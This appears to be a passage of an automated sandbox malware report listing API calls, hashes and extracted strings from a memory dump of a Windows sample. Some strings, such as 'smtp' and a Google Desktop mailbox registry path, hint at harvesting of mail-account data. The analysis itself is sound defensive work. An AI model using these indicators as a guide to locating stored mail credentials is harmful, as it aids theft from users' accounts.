                                                                                                                                                              • Instruction Fuzzy Hash: 86418072A00209EBDF00DF95CC85BDE7775FF85315F14411AE924A7280D778EAA4CB99
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memcpymemset
                                                                                                                                                              • String ID: winRead
                                                                                                                                                              • API String ID: 1297977491-2759563040
                                                                                                                                                              • Opcode ID: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                                                                                              • Instruction ID: 3ec02e552038d814b148e8dc6d2e6fcfdb14063e9eab1ef980803e4d567ed084
                                                                                                                                                              • Opcode Fuzzy Hash: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                                                                                              • Instruction Fuzzy Hash: DC31C372A00218ABDF10DF69CC46ADF776AEF84314F184026FE14DB241D334EE948BA9
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 0044955B
                                                                                                                                                              • memset.MSVCRT ref: 0044956B
                                                                                                                                                              • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                                                                                              • memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memcpymemset
                                                                                                                                                              • String ID: gj
                                                                                                                                                              • API String ID: 1297977491-4203073231
                                                                                                                                                              • Opcode ID: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                                                                                              • Instruction ID: 902d5c3a1247e7abcff0c4a84da7d54d3a467651d8a5431b25503c8ae0e770b6
                                                                                                                                                              • Opcode Fuzzy Hash: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                                                                                              • Instruction Fuzzy Hash: AF216A733443402BF7259A3ACC41B5B775DDFCA318F16041EF68A8B342E67AEA058715
                                                                                                                                                              APIs
                                                                                                                                                              • GetParent.USER32(?), ref: 004090C2
                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 004090CF
                                                                                                                                                              • GetClientRect.USER32(00000000,?), ref: 004090DA
                                                                                                                                                              • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                                                                                                                                              • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 4247780290-0
                                                                                                                                                              • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                                                                                              • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                                                                                                                                                              • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                                                                                              • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00407107: memset.MSVCRT ref: 00407127
                                                                                                                                                                • Part of subcall function 00407107: GetClassNameA.USER32(?,00000000,000000FF), ref: 0040713A
                                                                                                                                                                • Part of subcall function 00407107: _strcmpi.MSVCRT ref: 0040714C
                                                                                                                                                              • SetBkMode.GDI32(?,00000001), ref: 0041079E
                                                                                                                                                              • GetSysColor.USER32(00000005), ref: 004107A6
                                                                                                                                                              • SetBkColor.GDI32(?,00000000), ref: 004107B0
                                                                                                                                                              • SetTextColor.GDI32(?,00C00000), ref: 004107BE
                                                                                                                                                              • GetSysColorBrush.USER32(00000005), ref: 004107C6
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Color$BrushClassModeNameText_strcmpimemset
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2775283111-0
                                                                                                                                                              • Opcode ID: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                                                                                                                                              • Instruction ID: 687cb18978465a3feaaa07aa3b8de37e8775815fe2b8de28c5581ef0bdca0d30
                                                                                                                                                              • Opcode Fuzzy Hash: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                                                                                                                                              • Instruction Fuzzy Hash: AAF03135101109BBCF112FA5DC49ADE3F25EF05711F14812AFA25A85F1CBB5A990DF58
                                                                                                                                                              APIs
                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004147CE
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                              • String ID: winSeekFile$winTruncate1$winTruncate2
                                                                                                                                                              • API String ID: 885266447-2471937615
                                                                                                                                                              • Opcode ID: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                                                                                                                                                              • Instruction ID: 76c2d8f9c45a6ab14154b13c081d04d7f34c1e3f6c53ca943db3ce1179081271
                                                                                                                                                              • Opcode Fuzzy Hash: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                                                                                                                                                              • Instruction Fuzzy Hash: 5C313175600700AFE720AF65CC41EABB7E8FB88715F104A2EF965932D1D734E8808B29
                                                                                                                                                              APIs
                                                                                                                                                              • _strcmpi.MSVCRT ref: 0040E134
                                                                                                                                                              • _strcmpi.MSVCRT ref: 0040E14D
                                                                                                                                                              • _mbscpy.MSVCRT(?,smtp,0040DE7F,0040DE7F,?,?,00000000,000000FF), ref: 0040E19A
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _strcmpi$_mbscpy
                                                                                                                                                              • String ID: smtp
                                                                                                                                                              • API String ID: 2625860049-60245459
                                                                                                                                                              • Opcode ID: 407fd4cd9c5cafa87f943c7cdde1874e153e025f22c42b823323a6ce76bf96c9
                                                                                                                                                              • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                                                                                                                                                              • Opcode Fuzzy Hash: 407fd4cd9c5cafa87f943c7cdde1874e153e025f22c42b823323a6ce76bf96c9
                                                                                                                                                              • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                                                                              • memset.MSVCRT ref: 00408258
                                                                                                                                                                • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082A6
                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082C3
                                                                                                                                                              Strings
                                                                                                                                                              • Software\Google\Google Desktop\Mailboxes, xrefs: 00408230
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Close$EnumOpenmemset
                                                                                                                                                              • String ID: Software\Google\Google Desktop\Mailboxes
                                                                                                                                                              • API String ID: 2255314230-2212045309
                                                                                                                                                              • Opcode ID: cc5d6d64aea0813188cde2f76db8480d49896f172f032d850e05fd1d4fe80f83
                                                                                                                                                              • Instruction ID: e7ff4aa50d33639bacb2d5000aefce928628a80d8311d3545e17288fa3d3d8ee
                                                                                                                                                              • Opcode Fuzzy Hash: cc5d6d64aea0813188cde2f76db8480d49896f172f032d850e05fd1d4fe80f83
                                                                                                                                                              • Instruction Fuzzy Hash: 9D118F72408345ABD710EE51DC01EABBBACEFD0344F04093EBD9491091EB75D958C6AA
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 0040C28C
                                                                                                                                                              • SetFocus.USER32(?,?), ref: 0040C314
                                                                                                                                                                • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FocusMessagePostmemset
                                                                                                                                                              • String ID: S_@$l
                                                                                                                                                              • API String ID: 3436799508-4018740455
                                                                                                                                                              • Opcode ID: e2b80c6bc645313a4292a5829f5b0635f9a789c9535e0ddf74fc40c289d6b9ff
                                                                                                                                                              • Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
                                                                                                                                                              • Opcode Fuzzy Hash: e2b80c6bc645313a4292a5829f5b0635f9a789c9535e0ddf74fc40c289d6b9ff
                                                                                                                                                              • Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _mbscpy
                                                                                                                                                              • String ID: C^@$X$ini
                                                                                                                                                              • API String ID: 714388716-917056472
                                                                                                                                                              • Opcode ID: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                                                                                              • Instruction ID: 848b4a5d233ab05c703a0d630411b91f0640a461eb42b4d170138ac17b774cf5
                                                                                                                                                              • Opcode Fuzzy Hash: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                                                                                              • Instruction Fuzzy Hash: F601B2B1D002489FDB50DFE9D9856CEBFF4AB08318F10802AE415F6240EB7895458F59
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                                                                                                                • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,0040709F,Arial,0000000E,00000000), ref: 00407011
                                                                                                                                                              • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                                                                                                                              • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                                                                                                                              • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                                                                                                                              • String ID: MS Sans Serif
                                                                                                                                                              • API String ID: 3492281209-168460110
                                                                                                                                                              • Opcode ID: fba1b153f1476fe7d17889d81f23932038493b3a6f8049a49ffc4c2ea38943aa
                                                                                                                                                              • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                                                                                                                                                              • Opcode Fuzzy Hash: fba1b153f1476fe7d17889d81f23932038493b3a6f8049a49ffc4c2ea38943aa
                                                                                                                                                              • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ClassName_strcmpimemset
                                                                                                                                                              • String ID: edit
                                                                                                                                                              • API String ID: 275601554-2167791130
                                                                                                                                                              • Opcode ID: db8b236e199e929443ba679e8cc25b3238d768833fac675e2ea724ace2b39a9c
                                                                                                                                                              • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                                                                                                                                                              • Opcode Fuzzy Hash: db8b236e199e929443ba679e8cc25b3238d768833fac675e2ea724ace2b39a9c
                                                                                                                                                              • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: strlen$_mbscat
                                                                                                                                                              • String ID: 3CD
                                                                                                                                                              • API String ID: 3951308622-1938365332
                                                                                                                                                              • Opcode ID: ea07c3cf78fe23fa274cd57f6e103936ddd3628895d35173825c115ee7dc3945
                                                                                                                                                              • Instruction ID: 1107c6f19d6a4433d5fdc1d3c5cfb72f3531f1d81a70b052f8a244d3c085287a
                                                                                                                                                              • Opcode Fuzzy Hash: ea07c3cf78fe23fa274cd57f6e103936ddd3628895d35173825c115ee7dc3945
                                                                                                                                                              • Instruction Fuzzy Hash: 1BD0A77390C2603AE61566167C42F8E5BC1CFD433AB15081FF408D1281DA3DE881809D
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memset
                                                                                                                                                              • String ID: rows deleted
                                                                                                                                                              • API String ID: 2221118986-571615504
                                                                                                                                                              • Opcode ID: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                                                                                                                              • Instruction ID: 17dfb349c3cd8fc2c2490db290532cf881f14abfa8d6012d9aa572d9710d7201
                                                                                                                                                              • Opcode Fuzzy Hash: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                                                                                                                              • Instruction Fuzzy Hash: D5028171E00218AFDF14DFA5D981AEEBBB5FF08314F14005AF914B7291D7B9AA41CBA4
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 004073B3: memset.MSVCRT ref: 004073C1
                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ??2@$memset
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1860491036-0
                                                                                                                                                              • Opcode ID: 5d3be79d398e0043749495dd296c093f7ddeccd389f7318e4c6f9d3722586f48
                                                                                                                                                              • Instruction ID: bd2fcbe50e3d5b8ec1466eca70e60fda3411ba7e10a355e4f398212a99dd52d4
                                                                                                                                                              • Opcode Fuzzy Hash: 5d3be79d398e0043749495dd296c093f7ddeccd389f7318e4c6f9d3722586f48
                                                                                                                                                              • Instruction Fuzzy Hash: 973162B09107508FE751DF3A8845A16FBE4FF80B05F25486FD549CB2A2E779E5408B19
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 0040D2C2
                                                                                                                                                              • memset.MSVCRT ref: 0040D2D8
                                                                                                                                                              • memset.MSVCRT ref: 0040D2EA
                                                                                                                                                              • memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                                                                              • memset.MSVCRT ref: 0040D319
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memset$memcpy
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 368790112-0
                                                                                                                                                              • Opcode ID: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                                                                                                              • Instruction ID: 358c417c53aa398974aae77e4359fd90ac0a4dba5340dfd55ca125e4bb0c9b0b
                                                                                                                                                              • Opcode Fuzzy Hash: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                                                                                                              • Instruction Fuzzy Hash: 8E01D8B5A40B406BE235AE25CC03F2AB3A8DF91714F400A2EF692676C1D7B8F509915D
                                                                                                                                                              APIs
                                                                                                                                                              • __allrem.LIBCMT ref: 00425850
                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00425885
                                                                                                                                                              • __allrem.LIBCMT ref: 00425933
                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042597B
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1992179935-0
                                                                                                                                                              • Opcode ID: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                                                                                                                                                              • Instruction ID: 2fc5b562d87482ee0bf7138f77baf3e4365ffd42061eb2d4d5abd72185a9e376
                                                                                                                                                              • Opcode Fuzzy Hash: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                                                                                                                                                              • Instruction Fuzzy Hash: C96180B1A00A29DFCF149B64D840AAEB7B1FF45320F68815AE548AB391D7389D81CF19
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                                                                                                                                                              • too many SQL variables, xrefs: 0042C6FD
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memset
                                                                                                                                                              • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                                                                                                                                              • API String ID: 2221118986-515162456
                                                                                                                                                              • Opcode ID: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                                                                                                              • Instruction ID: 69d39437184f158b69242413db2932325e78deb4f0df02558d14bae7a1bb2b74
                                                                                                                                                              • Opcode Fuzzy Hash: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                                                                                                              • Instruction Fuzzy Hash: 93518B31B00626EFDB29DF68D481BEEB7A4FF09304F50016BE811A7251D779AD51CB88
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
                                                                                                                                                              • memset.MSVCRT ref: 004026AD
                                                                                                                                                                • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                                                                                                • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                                                                                                • Part of subcall function 004108E5: memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                                                                                                                                • Part of subcall function 004108E5: CoTaskMemFree.COMBASE(00000000), ref: 00410970
                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 004027A6
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
